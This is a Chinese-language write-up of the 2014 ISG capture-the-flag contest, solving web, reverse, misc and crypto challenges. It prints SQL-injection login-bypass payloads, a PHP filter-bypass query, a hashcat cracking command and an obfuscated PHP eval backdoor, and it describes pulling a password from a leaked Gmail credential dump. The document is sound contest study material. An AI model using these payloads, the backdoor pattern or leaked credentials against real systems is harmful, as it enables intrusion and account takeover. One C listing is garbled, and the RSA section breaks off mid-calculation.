2014 isg writeup

admin 2022年5月17日12:10:34安全博客 CTF专场评论5 views40245字阅读134分9秒阅读模式

0×00 前言
好久没法文章了 主要是极客大挑战开始了之后 一直好累 有一篇isg 和xdctf都没发

0×01 Web

web200 smile
2014 isg writeup
访问之后出现一个提交框
2014 isg writeup
查看一下源代码 点XD进去 可以看到php源码
http://202.120.7.104:8888/?view-source

<?php  
    if (isset($_GET['view-source'])) { 
        show_source(__FILE__); 
        exit(); 
    } 

    include('flag.php'); 

    $smile = 1;  

    if (!isset ($_GET['^_^'])) $smile = 0;  
    if (ereg ('\.', $_GET['^_^'])) $smile = 0;  
    if (ereg ('%', $_GET['^_^'])) $smile = 0;  
    if (ereg ('[0-9]', $_GET['^_^'])) $smile = 0;  
    if (ereg ('http', $_GET['^_^']) ) $smile = 0;  
    if (ereg ('https', $_GET['^_^']) ) $smile = 0;  
    if (ereg ('ftp', $_GET['^_^'])) $smile = 0;  
    if (ereg ('telnet', $_GET['^_^'])) $smile = 0;  
    if (ereg ('_', $_SERVER['QUERY_STRING'])) $smile = 0;  
    if ($smile) { 
        if (@file_exists ($_GET['^_^'])) $smile = 0;  
    }  
    if ($smile) { 
        $smile = @file_get_contents ($_GET['^_^']);  
        if ($smile === "(●'◡'●)") die($flag);  
    }  
?>

这里分析一下逻辑 就是要用get提交^_^让$smile为一个字符串(●’◡’●) 并且能绕过那些过滤 一开始想了很久 过滤了下划线并不好绕过 后来才发现ereg (‘%’, $_GET['^_^'])这里只是过滤了GET的值 对应的GET的键没有过滤 所以_可以用%5f来进行url编码绕过 算是解决了第一步
然后还有一个传入的(●’◡’●)的问题 题目给出了提示 url编码 这里上面过滤了那么多协议 明显是一种提示 LFI中有种姿势读文件就是利用php伪协议
那么测试一下php伪协议 配合url编码
使用burp抓包 %28%E2%97%8F%27%E2%97%A1%27%E2%97%8F%29 url编码
2014 isg writeup
ISG{_1N2N3N4N5N6B7B8B9B10B_}

web200 Find Shell
2014 isg writeup
访问题目之后,出现上传页面。上传一个php脚本试试。
2014 isg writeup
成功上传,没找到路径。抓包发现提示。
2014 isg writeup
按照这样的命名规则的话,文件名是十分的长。而且后面的40位是随机数sha1的。完全不可以预测的。还好以前在乌云看到这样的一篇文章。
各大CMS厂商的CMS存在的同一设计缺陷

通过windows的短文件命名规则可以访问到文件。然后来一发。
2014 isg writeup
PS:73dce7为上传文件名的md5的前6位。

web300 X-Area
描述:
限制区域,非请勿入!
http://202.120.7.110:8888
http://202.112.26.126:8888

进入http://202.120.7.110:8888,要求输入用户名密码,测试admin admin等弱口令失败,取消后看到提示
2014 isg writeup
看到一个gmail邮箱,查询手中的Gmail裤子
2014 isg writeup
得到用户名密码
[email protected]:zasada
登陆成功但是显示Access DENIED!

查看源码
2014 isg writeup

得到

Access DENIED!<!-- <?php
/*
I found a piece of hash from an old basic auth file.
0ops:$apr1$XZ6oHreE$rYRGk9cFLxm1hF4TAc0m50
That may be helpful.
It is said that in the password nums and Lowercase letter only.
Good luck!
*/
$valid_passwords = array ("[email protected]" => "zasada");
$valid_users = array_keys($valid_passwords);

$user = @$_SERVER['PHP_AUTH_USER'];
$pass = @$_SERVER['PHP_AUTH_PW'];

$validated = (in_array($user, $valid_users)) && ($pass == $valid_passwords[$user]);

if (!$validated) {
  header('WWW-Authenticate: Basic realm="X-Area"');
  header('HTTP/1.0 401 Unauthorized');
  die ("I don't think you are '[email protected]'. Get out!");
}

eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOwpzZXRfdGltZV9saW1pdCgwKTsKCmZ1bmN0aW9uIGRlY3J5cHQoJGVuY3J5cHRlZCwgJGtleSkKewoJJGtleT1tZDUoJGtleSk7CiAgICAkY2lwaGVydGV4dF9kZWMgPSBwYWNrKCJIKiIsJGVuY3J5cHRlZCk7CiAgICAkbW9kdWxlID0gbWNyeXB0X21vZHVsZV9vcGVuKE1DUllQVF9SSUpOREFFTF8xMjgsICcnLCBNQ1JZUFRfTU9ERV9DQkMsICcnKTsKICAgICRpdiA9IHN1YnN0cihtZDUoJGtleSksMCxtY3J5cHRfZW5jX2dldF9pdl9zaXplKCRtb2R1bGUpKTsKICAgIG1jcnlwdF9nZW5lcmljX2luaXQoJG1vZHVsZSwgJGtleSwgJGl2KTsKICAgICRkZWNyeXB0ZWQgPSBtZGVjcnlwdF9nZW5lcmljKCRtb2R1bGUsICRjaXBoZXJ0ZXh0X2RlYyk7CiAgICBtY3J5cHRfZ2VuZXJpY19kZWluaXQoJG1vZHVsZSk7CiAgICBtY3J5cHRfbW9kdWxlX2Nsb3NlKCRtb2R1bGUpOwogICAgcmV0dXJuIHJ0cmltKCRkZWNyeXB0ZWQsIlwwIik7Cn0KCmlmKEAkX1JFUVVFU1RbJ2tleSddKXsKCSRrZXk9JF9SRVFVRVNUWydrZXknXTsKCWVjaG8gZXZhbCh+J5qcl5Dfmomek9ebmpyNho+L193OyJ2bzZyanp2am8zKns7Pz5mZnJuZyp2bm8bPzpmems7OxsrHypzJncrLyc7Nm8bHz8vMy8jKns6ZxpqdnJvGxsvPx86ZnJ7NnczLx57JzsvMz8jLycrKyprInM2dyMjKzJnPzcadysedz87IxpydzZvOzsidnc/Kmc7My5zNm57NmcnPxp3OzMzMys7OmZzIyMidmZ3PxpzNnMycx8uczZqdxpmcms/Mzp3Gxs7LyczJxpucmc2emsfNy8nJx8mby5qezJmbzcbOycidyciczMzPzMqdncuezcjKmsaanJ3IzsaczMidyc+Zyp2azZnNzZzJxpyazcvGyciam5zOncrGyJ7NxsedmZnGz8qbmZqamsbInsyezciZnpnIxp3Myp7HzMrHx8jPz5mdz8/Kz8vOnJqans3HyJuamcvHnsiemZmdx8zOx52dm8bHmsadnZ2ezcbJm52Zm57Gm8/O3dPf25SahtbWxCcpOwp9ZWxzZXsKCWVjaG8gIkFjY2VzcyBERU5JRUQhIjsKfQ=='));
echo '<!-- ';
echo file_get_contents(__FILE__);

将中间base64加密部分解码
2014 isg writeup

注意到echo eval(~’ 的部分,想到之前有看过取反输出的php后门,于是把这段输出出来
2014 isg writeup
2014 isg writeup
得到

echo eval(decrypt("17bd2ceabed35a100ffcdf5bdd901fae119585c6b54612d98043475a1f9ebcd994081fca2b348a61430746555e7c2b7753f029b58b0179cb2d117bb05f134c2da2f609b1333511fc777bfb09c2c3c84c2eb9fce031b99146369dcf2ae8246686d4ea3fd29167b67c33035bb4a275e9ecb719c37b60f5be2f22c69ce24967edc1b597a298bff905dfeee97a3a27faf79b35a83588700fb005041ceea287def48a7affb8318bbd98e9bbba296dbfda9d01", $key));

是个解密的函数,结合之前的代码,得到

<?php
	function decrypt($encrypted, $key)
	{
		$key=md5($key);
		$ciphertext_dec = pack("H*",$encrypted);
		$module = mcrypt_module_open(MCRYPT_RIJNDAEL_128, '', MCRYPT_MODE_CBC, '');
		$iv = substr(md5($key),0,mcrypt_enc_get_iv_size($module));
		mcrypt_generic_init($module, $key, $iv);
		$decrypted = mdecrypt_generic($module, $ciphertext_dec);
		mcrypt_generic_deinit($module);
		mcrypt_module_close($module);
		return rtrim($decrypted,"\0");
	}
	echo(decrypt("17bd2ceabed35a100ffcdf5bdd901fae119585c6b54612d98043475a1f9ebcd994081fca2b348a61430746555e7c2b7753f029b58b0179cb2d117bb05f134c2da2f609b1333511fc777bfb09c2c3c84c2eb9fce031b99146369dcf2ae8246686d4ea3fd29167b67c33035bb4a275e9ecb719c37b60f5be2f22c69ce24967edc1b597a298bff905dfeee97a3a27faf79b35a83588700fb005041ceea287def48a7affb8318bbd98e9bbba296dbfda9d01", $key));
?>

这里需要一个key值,看之前的提示,0ops:$apr1$XZ6oHreE$rYRGk9cFLxm1hF4TAc0m50
使用hashcat进行GPU破解
参考资料:
GPU破解神器Hashcat使用简介
将需要破解的内容保存为1.txt
2014 isg writeup
查表得到加密类型
2014 isg writeup
使用cudaHashcat64.exe –hash-type 1600 –attack-mode 3 –increment –increment-max 8 –custom-charset1 ?l?d d:1.txt ?1?1?1?1?1?1?1?1
解出key:5s41t

最终通过

<?php
	function decrypt($encrypted, $key)
	{
		$key=md5($key);
		$ciphertext_dec = pack("H*",$encrypted);
		$module = mcrypt_module_open(MCRYPT_RIJNDAEL_128, '', MCRYPT_MODE_CBC, '');
		$iv = substr(md5($key),0,mcrypt_enc_get_iv_size($module));
		mcrypt_generic_init($module, $key, $iv);
		$decrypted = mdecrypt_generic($module, $ciphertext_dec);
		mcrypt_generic_deinit($module);
		mcrypt_module_close($module);
		return rtrim($decrypted,"\0");
	}

	$key = "5s41t";
	echo(decrypt("17bd2ceabed35a100ffcdf5bdd901fae119585c6b54612d98043475a1f9ebcd994081fca2b348a61430746555e7c2b7753f029b58b0179cb2d117bb05f134c2da2f609b1333511fc777bfb09c2c3c84c2eb9fce031b99146369dcf2ae8246686d4ea3fd29167b67c33035bb4a275e9ecb719c37b60f5be2f22c69ce24967edc1b597a298bff905dfeee97a3a27faf79b35a83588700fb005041ceea287def48a7affb8318bbd98e9bbba296dbfda9d01", $key));
?>

得到ISG{tHe_MaGic_pHP_S0UrCE_c0D3}
2014 isg writeup

web400 Safesite
描述:
这是一个非常安全的网站,该如何拿到flag呢 ?
http://202.120.7.109:8888
http://202.112.26.124:8888
*注意:在服务器的8888端口绑定了reallysafesite.org的相关域名

根据提示,判断这个ip绑定了某个reallysafesite.org的二级域名,先在本地hosts中添加记录
2014 isg writeup
访问www.reallysafesite.org使用burp抓包,获得向202.120.7.109的GET包
2014 isg writeup
使用dnsenum的二级域名字典,然后使用burp进行爆破
2014 isg writeup
2014 isg writeup
发现admin.reallysafesite.org:8888 返回302
为方便,在本地hosts中添加记录
202.120.7.109 admin.reallysafesite.org,然后访问
2014 isg writeup
测试admin’ 发现注入,使用burp抓到post数据包
2014 isg writeup
保存为sql文件,使用sqlmap进行post注入
分别得到

available databases [4]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] safesite

Database: safesite
[1 table]
+-----------+
| isg_admin |
+-----------+

Database: safesite
Table: isg_admin
[4 columns]
+----------+------------------+
| Column   | Type             |
+----------+------------------+
| info     | varchar(200)     |
| password | varchar(64)      |
| uid      | int(10) unsigned |
| username | varchar(32)      |
+----------+------------------+

Database: safesite
Table: isg_admin
[1 entry]
+-----+-----------------------------+----------+----------------------------------+
| uid | info                        | username | password                         |
+-----+-----------------------------+----------+----------------------------------+
| 1   | login and capture the flag! | admin    | 86c969bebab9cfeb47efcc65d85f26c5 |
+-----+-----------------------------+----------+----------------------------------+

然后登陆框处
判断查询列数 abc’ and sleep(5) order by *#
*为4和5时返回不同,判断为4列

自设密码abc md5后得到’900150983cd24fb0d6963f7d28e17f72′
因为无法判断查询的密码在哪一列,那就都试试

abc' union select '900150983cd24fb0d6963f7d28e17f72','admin','admin','admin'#
abc' union select 'admin','900150983cd24fb0d6963f7d28e17f72','admin','admin'#
abc' union select 'admin','admin','900150983cd24fb0d6963f7d28e17f72','admin'#		==>登陆成功,密码在第三列
abc' union select 'admin','admin','admin','900150983cd24fb0d6963f7d28e17f72'#

2014 isg writeup
看到cookie 设置为
Cookie: u=admin; p=b349e67445488ae1fad84633400057e759a46fb3
将得到的p值扔到cmd5解密
2014 isg writeup
发现是abc md5加密后再进行sha1加密
猜测是登陆后还要验证cookie
于是将之前注入得到的admin用户的MD5密码再进行一次sha1加密,得到0fa2bf55d6cb9714da177d9c59e22e51d796ab43
2014 isg writeup
然后修改GET /index.php的包中的cookie为这串字符串
2014 isg writeup
得到flag
2014 isg writeup

web100 Up-to-date
描述:
每周更新服务器,以确保flag.txt安全。
http://202.112.26.125:8888/
http://202.120.7.112:8888/

送分题,刚出时一段时间大家都没做出来,大家都有点蒙,后来看主办方强调是送分题,结合描述中的每周更新服务器,猜测是刚出的bash漏洞
姿势在CVE: 2014-7169 Bash Specially-crafted Environment Variables Code Injection Vulnerability Analysis
直接用原文的语句,修改一下
2014 isg writeup
得到flag

0×02 Reverse
Reverse100 wangrange
格朗很喜欢外国算术。

IDA 分析:
2014 isg writeup

2014 isg writeup

2014 isg writeup

在 Sub_401270 中, 讲输入的字符串进行运算得到4个值, 作为下一轮解密运算的KEY。

在 sub_ 4013A0中, 程序将得到4个值的ASCII 分别 +18 添加到32个固定字符串的头部,然后调用 sub_4010D0(&Dest) 来解密得到一个字符, 最终生产的 Text 就是程序弹出的内容。

这个也是一样,写程序跑。 我是直接用IDA里 代码来枚举的。
一个关键点就是前4个字符 是 ISG{

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>
int p[10];
unsigned int v3[2];
int __cdecl sub_401000(signed int a1, signed int a2, char a3)
{
  int v4; // [sp+4h] [bp-4h]@0

  switch ( a3 )
  {
    case 'P':
      v4 = a2 + a1;
      break;
    case 'M':
      v4 = a1 - a2;
      break;
    case 'U':
      v4 = a2 * a1;
      break;
    case 'V':
      if ( !a2 )
        a2 = 1;
      v4 = a1 / a2;
      break;
    case 'X':
      v4 = a2 ^ a1;
      break;
    default:
      return v4;
  }
  return v4;
}

int __cdecl sub_4010A0(char a1)
{
  return a1 >= 65 && a1 < 75;
}

signed int __cdecl sub_4010D0(const char *a1)
{

  char v2; // [sp+13h] [bp-1Dh]@3
  int v5; // [sp+1Ch] [bp-14h]@1
  unsigned int v6; // [sp+20h] [bp-10h]@1
  int v7; // [sp+24h] [bp-Ch]@1
  unsigned int v8; // [sp+28h] [bp-8h]@1
  char v9; // [sp+2Fh] [bp-1h]@9

  v5 = 2;
  v8 = 0;
  v6 = strlen(a1);
  v7 = 0;
  v3[0] = 0;
  v3[1] = 0;

  while ( (signed int)v8 <= (signed int)v6 )
  {
    v2 = a1[v8];
    if ( v7 >= 2 )
      return -1;
    if ( (unsigned __int8)sub_4010A0(v2) )
    {
      v3[v7] *= 10;
      v3[v7] = v2 + v3[v7] - 65;
    }
    else
    {
      if ( v2 )
      {
        if ( v2 != 80 && v2 != 86 && v2 != 77 && v2 != 85 && v2 != 88 )
        {
          if ( v2 == 32 )
            ++v7;
        }
        else
        {
          v9 = v2;
        }
      }
      else
      {
        if ( v7 > 1 )
        {
          v3[0] = sub_401000(v3[0], v3[1], v9);
//          printf("\n%d\n",v3[0]);
          v3[1] = 0;
          --v7;
        }
      }
    }
    if ( v7 > 1 )
    {
      v3[0] = sub_401000(v3[0], v3[1], v9);
      v3[1] = 0;
//      printf("\n%x\n",v3[0]%0x100);
      --v7;
    }
    ++v8;
  }
//  printf("\n%x\n",v3[0]%0x100);
  return (v3[0]%0x100);
}

int __cdecl sub_401250(char a1, char a2)
{
  return (a1 >> 2 * a2) & 3;
}

char sub_401270(char a1[])
{
    int i,j;
    char v6=0;
    int v1;
    int len=strlen(a1);
    for(i=0;i<len;i++)
        v6^=a1[i];
    for(j=0;j<4;j++)
    {
        v1 = sub_401250(v6,j) + 4*len;
        p[j]=v1;
    }
}

void cal_key(char str[],char key)
{
    int i,j;
    char t;
    for(i=0x20;i<=0x6F;i++)
            for(j=0x20;j<=0x6F;j++)
            {
                str[1]=i;
                str[2]=j;
                t=sub_4010D0(str);
                if(t==key)
                {
                //    printf("find!");
                    printf("%c -> %c %c \n",key,i-17,j-17);
                }
            }

}
int main()
{
    char str1[]="PBG CBI PHJ MJH MIJ XBBH MBAE XFC MBBI XBAA XIH XGA XGG ";
    char str2[]="PBH GJ MBCF XED MDI PEI PFC XHB MEJ PDG XFC PGE ";
    char str3[]="PAA JE XGH XBAI MBCC XII PFB MHH XBCC PDI PFC XHE MFG XGF ";
    char str4[]="PAA MGD PBCH MHE XBAE PFH XHF PBCD MFE XIG PDE PHJ XBBA PDE XJH XGG PIJ XFG XJA PEG PGE ";
    cal_key(str1,'I');
    cal_key(str2,'S');
    cal_key(str3,'G');
    cal_key(str4,'{');

    return 0;
}

2014 isg writeup

这样就可以得到 4个 整形值, 84,86,85,87 对应的16进制就是54,56,55,57
然后直接OD 载入修改整型值 ,
2014 isg writeup

运行一下出KEY
2014 isg writeup

KEY: ISG{Ppp0oo01i5h_pR3f1x_N0ta7iOn}

Reverse 200 TRAC4!
洗衣hu在洗衣服的时候从衣服里洗出了一条trace!
初看之下,看多这么多汇编人都昏了,后来慢慢看,沉住气,还是看得出来了。 在一些CALL,JMP 跳转 加上一些换行讲代码分割成小部分就稍微好看一些。
程序开头有一个CALL 401060 , 作用就是对0x40a000 进行了一堆赋值。
2014 isg writeup

2014 isg writeup

2014 isg writeup

0x40a000
74 44 52 56 68 6c 78 4e 2b 79 63 51 59 47 4b 61 
58 30 34 38 41 50 42 55 69 33 4d 72 54 49 56 36 
32 57 62 4f  77 5a 73 35 31 37 39 76  6e 75  2f 4a 
7a  6f 6b 53 43 66 70 65 67 64 6d 71  4c 6a  45 48 
00

其中有一个 jz401083, 我们可以通过查找找到下一步
2014 isg writeup

然后在00401031 这里又有一堆赋值。
2014 isg writeup

0x0012ff44
4e475034 31495356 36503834 36475559
6f4c6c47 41473572 46503554 7a777849
436a5a72 4f304f41 3d436559 00

在后面的
2014 isg writeup
这里是一个长度检查。

通过这几句
2014 isg writeup
我们可以找到 401083

然后在后面有一个循环
2014 isg writeup
在00401211 的 jnz 401218, 是一个关键点。 跳出循环后有一个对应的字符赋值。
2014 isg writeup

其中00401197 的赋值 49 刚好是 ‘I’ , 猜测这可能会是ISG 的FLAG,

然后我们可以找剩下赋值
2014 isg writeup

可以找到KEY : ISG{7hI5_1s_4_1nsTruCti0n_tR4c3}

0×03 Misc
misc100 sqlmap
2014 isg writeup
把包下载下来 然后wireshark打开
然后Filter http 只留下http包 因为sqlmap也是模仿的网页的提交http请求 所以这样子可以看到sqlmap发出去的包
观察一下 可以看到是在sqlmap跑一个盲注的时候抓的包 sqlmap会利用二分法来做 所以还是比较好判断的 只要用过sqlmap 了解盲注的原理还是很好做的 就是flag有点长
从808的包开始
2014 isg writeup
观察最后一个包

Message #1 AND ORD(MID((SELECT IFNULL(CAST(`value` AS CHAR),0x20) FROM isg.flags ORDER BY `value` LIMIT 0,1),1,1))>73:

如果是无回显的话 就是73

Message #1 AND ORD(MID((SELECT IFNULL(CAST(`value` AS CHAR),0x20) FROM isg.flags ORDER BY `value` LIMIT 0,1),6,1))>75: The quick brown fox jumps over the lazy dog

如果最后一个包是有回显的话 就是要加上1

然后把ascii码保存一下

73 83 71 123 66 76 105 110 100 95 83 81 108 95 73 110 74 69 99 84 105 48 78 95 68 101 84 69 99 84 69 100 125

转成ascii
ISG{BLind_SQl_InJEcTi0N_DeTEcTEd}

misc100 chopper
2014 isg writeup
还是给了一个pcap的包 然后需要wireshark打开
这里是一个抓了中国菜刀的包 包比起sqlmap那题是非常少的
Filter:http 过滤一下
发现他写了一个小马 还有在最后一个包36里有一个文件
File-Export Object-HTTP 提取出文件来
2014 isg writeup
2014 isg writeup
然后研究了一下菜刀的格式 是会在头和尾加上->| |<- 把这两个去掉
保存一下 然后在linux下 file一下看看文件格式 其实熟悉的看看1F8B也知道了
2014 isg writeup
看到是一个gz的文件 改成gz的后缀 用7z打开
2014 isg writeup
发现有个文件
2014 isg writeup
在里面就能找到一个flag
ISG{China_Ch0pper_Is_A_Slick_Little_Webshe11}

misc200 哼!
2014 isg writeup
得到一张png的图片
png的图片 就怕里面插个什么rar之类的 先用linux下的binwalk命令跑一发
2014 isg writeup
跑一发 发现了有两个PNG图片
然后确定了偏移是0x1D55DC 用winhex把图片扣出来 保存成2.png 原来的图final.png删除后面那的一部分 保存成1.png
2014 isg writeup

这样子就得到1.png和2.png 然后打开看看 发现是一样的图片 用linux下的命令

compare 1.png 2.png diff.png

2014 isg writeup
观察一下
2014 isg writeup
发现了左下的第二条像素有异常 对比一下1.png 2.png发现了2.png有问题
那么我们可以用一个神器来辅助 stegsolve.jar

然后再把利用Analyse-Image Combiner
2014 isg writeup
把1.png和2.png进行一下sub方法 把结果保存成solved.bmp

然后把2.png保存成2.bmp 24位位图的格式 这个是因为png图片经过了压缩 不好直接对比每个字节 而bmp图片是没有压缩的 直接就是明文保存是各个像数点
这个题还有一个坑点就是偏移的问题 png图片的扫描是从左向右 从下往上来的。
而这个图的信息隐藏并没有在一开头的像数 而是是第二行像数 所以就需要利用bmp的优势 寻找到偏移 找到信息隐藏的地方
利用winhex打开 黑色的在bmp中的00 我们就寻找不是00的地方
在偏移0×1110的地方可以发现
2014 isg writeup
有不是00的字节 一开始还以为这些就是flag的信息了 后来才发现是因为sub影响到了效果
所以打开2.bmp对比 寻找到0×1110的地方 到0×1330结束
2014 isg writeup
对比2.bmp可以发现隐藏了一些00 01这些信息 把这一部分扣出来
2014 isg writeup

00B66101B66100B56000B56001B56000B56000B45F01B45F00B45F01B45F00B35E01B35E00B35E00B35E01B35E01B15F00B05E01B25D00B25D00B25C00B35B01B35B01B35B01B35A00B35A01B35A01B35A01B35A01B35A00B35A01B35A01B25B00B25B01B25B00B25B00B25B00B35C01B35C00B35C01B25C00B25C00B35D01B35D01B35D00B35D01B45E00B45E00B55F00B55F01B55F01B55F01B55F00B55F00B55F01B55F01B35E00B35E01B25D00B25D01B25D01B25D00B15C00B15C01B45E00B45E01B35D00B35C01B25B01B15901B05801B05801B15900B15901B15900B15901B15900B15900B15901B15901B15900B15901B15901B15901B15900B15901B15900B15900B15900B15901B15900B15900B15900B15901B15900B15901B15C00B15B01B05C01B15C00AF5D00B05D01AF5E01AF5E01AA5D00AD5F00B05F01B26101B46000B75F01B75E00B65E00B35B00B35B01B35B01B25A00B25A01B15901B15901B15900B25A00B25A00B25A01B25A01B25A00B25A00B25A00B25A00B25A00B25A01B25A01B25A00B25A00B25A01B25A01B25A01B25A00B25A01B25A00B25A01B25A00B25A00B25A01B25A00B25A00B25A00B25A01B25A01B25A00B25A01B25A00B25A00B15900B15901B15901B15901B15900B15900B15900B15900B15900B15901B15900B15900B15901B15900B15900B15900B25A00B25A01B25A01B25A01B25A01B25A00B25A00B25A01B25A00B25A01B25A01B25A01B25A01B25A01B25A00B25A01B25A

然后利用正则b.5. 过滤除了01以外的信息 只保留00 01 这个是因为RGB的关系 只隐藏在R通道里面了 其他通道都是图片的正常信息 过滤掉就可以了

00010000010000010001000100000101000100000001010100010101010001010001000000010001000001010001000000010101000001010001000101000001000100010101010100010001000001010001010100010000000100000001000100010100000101010000010100010000000101000101010000000101000000000001010000010101000100010000010000000101000100000001010100000000000100000100000000010101010000010001010101010001

然后在吧00 替换成0 01替换成1

0100100101010011010001110111101101000101001101000111001101011001010111110101001101110100010001010110011100110100011011100011000001100111010100100011010001110000010010000111100101111101

然后就得到了这个 使用JPK
2014 isg writeup
binary-binary format
2014 isg writeup
binary-binary to ascii
得到了flag
ISG{E4sY_StEg4n0gR4pHy}

misc50 GIF
2014 isg writeup
这个题比较简单 秒了
http://202.120.7.253/upload/isg.gif
题目给了一个isg的gif图片
我们下下来 gif是动态图 这种的隐写一般都是隐藏在别的帧里面 然后设置时间长一些 很久才播放 导致隐藏的信息看不到 就像是静态的图一样
用工具分解一下图片
发现了第二帧有一个二维码 扫描一下
2014 isg writeup
二维码在线解码
解码一下 得到了flag
ISG{Solv3d_iN_SEConds_WiTH_RiGHT_T00Ls}

misc200 afere
2014 isg writeup
拿到一个apk 尝试改成zip解压它
2014 isg writeup
居然有密码 想爆破一下发现不对 貌似是伪加密。
用python脚本把dex提取出来。
2014 isg writeup
然后jeb打开dex,这里算法已经很明显了,变种的base64加密。
2014 isg writeup

于是写个函数求得a的反向索引表
2014 isg writeup
然后写个解密函数:
2014 isg writeup

可以得到加密后的字符串:
2014 isg writeup
DES解密后得到FLAG:ISG{f4kE3ncRyP710n!50ld}

misc25 0ops
这个就是个送分题 是在最后才出来的一个题目 是回答调查问卷 然后就可以拿到flag的

0×04 Crypto
crypto100 Cryptobaby
talentyange搞到了一个小程序,但是不知道密码,你能帮帮他吗?
IDA分析:
2014 isg writeup

2014 isg writeup

2014 isg writeup

算法比较清晰,然后写个程序来枚举下。

#include <stdio.h>
#include <stdlib.h>

int check(char str1[])
{
    int v4=0;
    int i;
    for(i=0;i<4;i++)
    {
        v4=str1[i]+0x83*v4;
    }
    return v4;
}
int main()
{
    //freopen("out.txt","w",stdout);
    char str1[10];
    int key[]={0x0d50ade5,0x0e302789,0x0ed66f1f,0x0cd463ff,0x0e0d94dd,0x0fa4461f,0x0cd91da2};
    int i,j,k,l;

    int p=0;
    int m;
    for(m=0;m<7;m++)
        for(i=0x20;i<=0x79;i++)
            for(j=0x20;j<=0x79;j++)
                for(k=0x20;k<=0x79;k++)
                    for(l=0x20;l<=0x79;l++)
                    {
                        str1[0]=i;
                        str1[1]=j;
                        str1[2]=k;
                        str1[3]=l;
                        str1[4]=0;
                        if(check(str1)==key

) { printf("%s",str1); p++; if(p>6) return 0; } } return 0; }

然后得到KEY ISG{c011isi0n_is_a_thre4t_t0_sec}

crypto250 RSA SYSTEM
2014 isg writeup
一道RSA的密码学问题
http://202.120.7.253/upload/rsasystem.txt
访问一下 发现有一个进行RSA加密的东西
nc 202.120.7.71 43434 在服务器上进行交互
2014 isg writeup
可以进行RSA加解密
还有一个debug功能
之前做过0ctf和bctf都遇到过RSA加密的题
0ops CTF/0CTF writeup
参考了一下这个题
然后研究了一下 发现我们可以先把N算出来

Input Plaintext:
3
Your ciphertext:
58885569232010588514199718560630245564375749510573561851478247862930422478754398413916501441734672562556438960025040638930128612323201338358528377979647820470770475951549770360024665752344615132011612960919292206244738542018740538871273745698118804184934148387475351322282991974467419746153079231944187075622

Input Plaintext:
5
Your ciphertext:
98656022689841173396843599503637906770938771521909410202917788000893922098453158389169397839992062096549834245032093184693635354111149465693839929562180846475247316828148076285930773601596930751803621572491236354625755416063728553348032690795462037219833920717962889844729149924690927299000450367396817101754

Input Plaintext:
15
Your ciphertext:
89136403960909381524748983541651585629123750890346371261159589198546538322669996903722211778891944801474352115107083259601308470967487093678107418314894025097874777173986008167430124698243374734529111788669495899658729668948176168798232739924797744912946144176728331877877362277072754036267212773128207584035

3^e mod N = x
5^e mod N = y
15^e mod N = z
a = (x*y)-z =
5809416054257449899841089528618959627507584870990042160917425999115023316826202749459828683484626419375272088492237697836453626150924628845892786781925862594746738191751067547570577306330822307197399994993104529584476856686177137795847155784298767226946859059953819430869235062475451873422167175671318977468259521367761285377443856963693587244507147775361317087074438621660068800786765211832877178916404389250424104903187228075992401746398877517175735350344295661662403560656218006560066259437139886930918384532552913459887861130115114427905821873615129995108435858864483946126497080562652750285240090536778659256953


------------------------------------------------------------------------------------------------------------------------------
Input Plaintext:
2
Your ciphertext:
18877414991073471328358552734684946036056197908879813680414167733080764875427000362412400025120564275289882281698098695371990076901964203623945792607338414060720520105512530906424243619206662593629668418429352625560725666966624562851285175599560460204754980459839448773022641706055542750210348677769250360763

Input Plaintext:
7
Your ciphertext:
111454628938263521191371495060185339234370850692912383312762463327285226916071540456165777987516437333950811490651654285944048530013499195480117818451245342969739073616056664833624472945712620623349847619991185028297835663160384960250678551167765087354909610373390549388545428666461403680960909925884456212422

Input Plaintext:
14
Your ciphertext:
72565635460194103665245725639311459835757832840423543445757807475093725678813692932008580807389943735573979765906766800300664338029275733778749855279143659100381630002878046817478163793998701542395216412944332633505845521260777972145214840475616085405534405086643412315022841739930290209865279684371266627866


2^e mod N = x
7^e mod N = y
14^e mod N = z
b = (x*y)-z =
2103975283143706928086246253614221685011761207531721521045884802717034406266432331980072957121248873832892985988585697740985643149690717617405845247336781323235995271216304926526105706219446512992151674236024180777998041661237400200330754561161867044329480809266885587112138899909004114433667441606880174098297388108235673064820166938483659078158677812376325067063501738357933102110385962588406797358220865829452786142270922847236717239231012133287230995661379076433022246800129510866395749737125098176603862344638479918623944012371011044131214049676935436875327340257651670551402782305091284424898919269328795370120

算出a b后 可以gcd算出N
这里个python脚本

def gcd(a,b):
	while b:
		a,b = b , a%b
	return a

a = 5809416054257449899841089528618959627507584870990042160917425999115023316826202749459828683484626419375272088492237697836453626150924628845892786781925862594746738191751067547570577306330822307197399994993104529584476856686177137795847155784298767226946859059953819430869235062475451873422167175671318977468259521367761285377443856963693587244507147775361317087074438621660068800786765211832877178916404389250424104903187228075992401746398877517175735350344295661662403560656218006560066259437139886930918384532552913459887861130115114427905821873615129995108435858864483946126497080562652750285240090536778659256953
b = 2103975283143706928086246253614221685011761207531721521045884802717034406266432331980072957121248873832892985988585697740985643149690717617405845247336781323235995271216304926526105706219446512992151674236024180777998041661237400200330754561161867044329480809266885587112138899909004114433667441606880174098297388108235673064820166938483659078158677812376325067063501738357933102110385962588406797358220865829452786142270922847236717239231012133287230995661379076433022246800129510866395749737125098176603862344638479918623944012371011044131214049676935436875327340257651670551402782305091284424898919269328795370120

print gcd(a,b)

N= 163299923594725837822065466024252288369968345166114296775267398674135203232399369097066231911703932876685787200953804367999219404652277507051132477767780777171583401548512406822302682440462953734186505877480309334593204565155837915080069002132147202319079756766392254726664638975415908872910181448796479878521

然后我们利用同余式的一个性质
若a % N = A 且 b % N = B,那么有(ab) % N = (AB) % N
观察代码 debug功能

secret = pow(int(open("flag.txt").read().strip().encode('hex'), 16), e, N)

def debug():
    print "I have no bug"
    print str(secret)


I have no bug
82938526687718470294491483403921860413192132827953695938770369409277502099989415324075790953012392184291358444443432233906559795134109912114370645058540251648761071123189585640228592437123293017660245076622212966902149908768100524662729622741444969760800686741993211073779566049439089106465265811847465509264

我们这里用c1=secret和c2=3来做运算

c1 = 82938526687718470294491483403921860413192132827953695938770369409277502099989415324075790953012392184291358444443432233906559795134109912114370645058540251648761071123189585640228592437123293017660245076622212966902149908768100524662729622741444969760800686741993211073779566049439089106465265811847465509264
c2 = 58885569232010588514199718560630245564375749510573561851478247862930422478754398413916501441734672562556438960025040638930128612323201338358528377979647820470770475951549770360024665752344615132011612960919292206244738542018740538871273745698118804184934148387475351322282991974467419746153079231944187075622
